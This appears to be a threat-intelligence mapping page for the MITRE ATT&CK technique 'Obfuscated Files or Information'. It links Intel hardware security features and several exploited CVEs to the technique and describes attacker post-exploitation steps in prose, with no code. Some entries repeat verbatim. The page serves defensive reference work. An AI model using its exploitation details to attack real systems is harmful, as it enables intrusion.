Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript.
Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)
Adversaries may also abuse Command Obfuscation to obscure commands executed from payloads or directly via Command and Scripting Interpreter. Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017)
View in MITRE ATT&CK®| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
|---|---|---|---|---|---|
| intel-ptt | Intel Platform Trust Technology | Win 11, Secure Boot | T1027 | Obfuscated Files or Information |
Comments
Windows Secure Boot leverages Intel PTT (TPM) to safeguard settings stored in UEFI, while Intel Boot Guard prevents unauthorized modifications to UEFI firmware. It verifies the signatures of the UEFI firmware, bootloader, and boot drivers before loading the operating system.
When the PC starts, the firmware checks the signature of each piece of boot software, including Unified Extensible Firmware Interface (UEFI) firmware drivers (also known as Option ROMs), Extensible Firmware Interface (EFI) applications, and the operating system. If the signatures are valid, the PC boots, and the firmware gives control to the operating system. Rollback protection also prevents the system from rolling back to older versions of firmware.
Secure Boot employs Intel PTT (TPM) to thwart attacks that attempt to alter the signature policy at the boot level in real-time or modify components involved in the boot process before the boot process. Intel Boot Guard ensures the integrity of the boot-level code before it is executed on the processor, preventing the system from proceeding with malicious boot code.
Secure Boot is able to address threats pre-os that change the signature of the loaded boot component.
References
|
| intel-tdt | Intel Threat Detection Technology | Microsoft Defender | T1027 | Obfuscated Files or Information |
Comments
Intel Threat Detection Technology's (Intel TDT) Accelerated Memory Scanning (AMS) enables efficient memory scanning by offloading these operations to the integrated Graphics Processor Unit (integrated GPU) on Intel client SoCs.
Microsoft Defender Antivirus leverages AMS to optimize the detection of polymorphic and fileless attacks, improving resource efficiency and reducing the performance impact on the Central Processing Unit (CPU).
References
|
| intel-tdt | Intel Threat Detection Technology | CrowdStrike AMS | T1027 | Obfuscated Files or Information |
Comments
Intel Threat Detection Technology's (Intel TDT) Accelerated Memory Scanning (AMS) enables efficient memory scanning by offloading these operations to the integrated Graphics Processor Unit (integrated GPU) on Intel client SoCs.
Microsoft Defender Antivirus leverages AMS to optimize the detection of polymorphic and fileless attacks, improving resource efficiency and reducing the performance impact on the Central Processing Unit (CPU).
Intel Threat Detection Technology (TDT), in combination with CrowdStrike's Accelerated Memory Scanning (CAMS), significantly enhances cybersecurity defenses by enabling the real-time detection of Obfuscated Files or Information (T1027). This integrated solution strengthens CrowdStrike Falcon by improving its ability to detect and mitigate cyber threats earlier in the kill chain, while minimizing system performance impact.
Obfuscated Files or Information (T1027) refers to adversaries using techniques to obfuscate their payloads, making it harder for traditional security measures to detect malicious code or data. Common obfuscation methods include packing, encryption, or using alternative encoding schemes to hide the true intent of the files. Intel TDT plays a critical role in identifying these threats by providing real-time telemetry on program execution, memory access, and control flow, helping security teams detect abnormal behaviors such as suspicious attempts to decode or unpack files, or attempts to execute obfuscated code.
References
|
| intel-tdt | Intel Threat Detection Technology | Microsoft Defender | T1027 | Obfuscated Files or Information |
Comments
Intel Threat Detection Technology's (Intel TDT) Accelerated Memory Scanning (AMS) enables efficient memory scanning by offloading these operations to the integrated Graphics Processor Unit (integrated GPU) on Intel client SoCs.
Microsoft Defender Antivirus leverages AMS to optimize the detection of polymorphic and fileless attacks, improving resource efficiency and reducing the performance impact on the Central Processing Unit (CPU).
Intel Threat Detection Technology (TDT), in combination with CrowdStrike's Accelerated Memory Scanning (CAMS), significantly enhances cybersecurity defenses by enabling the real-time detection of Obfuscated Files or Information (T1027). This integrated solution strengthens CrowdStrike Falcon by improving its ability to detect and mitigate cyber threats earlier in the kill chain, while minimizing system performance impact.
Obfuscated Files or Information (T1027) refers to adversaries using techniques to obfuscate their payloads, making it harder for traditional security measures to detect malicious code or data. Common obfuscation methods include packing, encryption, or using alternative encoding schemes to hide the true intent of the files. Intel TDT plays a critical role in identifying these threats by providing real-time telemetry on program execution, memory access, and control flow, helping security teams detect abnormal behaviors such as suspicious attempts to decode or unpack files, or attempts to execute obfuscated code.
References
|
| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
|---|---|---|---|---|---|
| CVE-2010-2883 | Adobe Acrobat and Reader Stack-Based Buffer Overflow Vulnerability | primary_impact | T1027 | Obfuscated Files or Information |
Comments
This vulnerability is exploited by the user opening a malicious pdf file to achieve arbitrary code execution.
References
|
| CVE-2022-24086 | Adobe Commerce and Magento Open Source Improper Input Validation Vulnerability | primary_impact | T1027 | Obfuscated Files or Information |
Comments
This vulnerability can be exploited via a public-facing e-commerce application in order to achieve remote code execution. To evade detection, the exploit segment responsible for downloading and executing the remote malicious PHP code is obfuscated.
References
|
| CVE-2021-40539 | Zoho ManageEngine ADSelfService Plus Authentication Bypass Vulnerability | secondary_impact | T1027 | Obfuscated Files or Information |
Comments
This is an authentication bypass vulnerability that can enable remote code execution.
Numerous post-exploitation impacts by threat actors are detailed in the referenced CISA report.
References
|
| CVE-2021-44077 | Zoho ManageEngine ServiceDesk Plus Remote Code Execution Vulnerability | secondary_impact | T1027 | Obfuscated Files or Information |
Comments
CVE-2021-44077 is an unauthenticated remote code execution vulnerability. The following post-exploitation activity has been observed by adversaries: writing webshells to disk for persistence, obfuscating and deobfuscating/decoding files or information, dumping user credentials, only using signed windows binaries for follow-on actions, adding/deleting user accounts as needed, exfiltrating the active directory database, using windows management instrumentation for remote execution, deleting files to remove indicators from the host, discovering domain accounts, collecting and archiving files for exfiltration, and using symmetric encryption for command and control.
References
|
| CVE-2021-40449 | Microsoft Windows Win32k Privilege Escalation Vulnerability | secondary_impact | T1027 | Obfuscated Files or Information |
Comments
This vulnerability is exploited by an attacker who has obtained administrative console access on the target system. The vulnerability lies in the Win32k driver, specifically in the NtGdiResetDC function, due to improper handling of user-mode callbacks. This vulnerability has been exploited by threat actors to gain elevated privileges on Windows servers. Attackers leveraged this flaw to execute arbitrary kernel commands, allowing them to manipulate system processes and deploy additional malware to perform further malicious activities.
The exploit in question is actively being used in the wild, primarily in espionage campaigns. It involves triggering a use-after-free condition by executing the ResetDC function a second time for the same handle during a callback. Once the vulnerability is exploited, attackers can manipulate memory to perform arbitrary kernel function calls with controlled parameters. This allows them to achieve their objectives, such as reading and writing kernel memory, with the same permissions as the compromised system's user.
References
|
| Technique ID | Technique Name | Number of Mappings |
|---|---|---|
| T1027.011 | Fileless Storage | 2 |
| T1027.009 | Embedded Payloads | 2 |
| T1027.013 | Encrypted/Encoded File | 2 |
| T1027.008 | Stripped Payloads | 2 |
| T1027.001 | Binary Padding | 2 |
| T1027.005 | Indicator Removal from Tools | 2 |
| T1027.003 | Steganography | 2 |
| T1027.004 | Compile After Delivery | 3 |
| T1027.010 | Command Obfuscation | 2 |
| T1027.002 | Software Packing | 3 |
| T1027.007 | Dynamic API Resolution | 2 |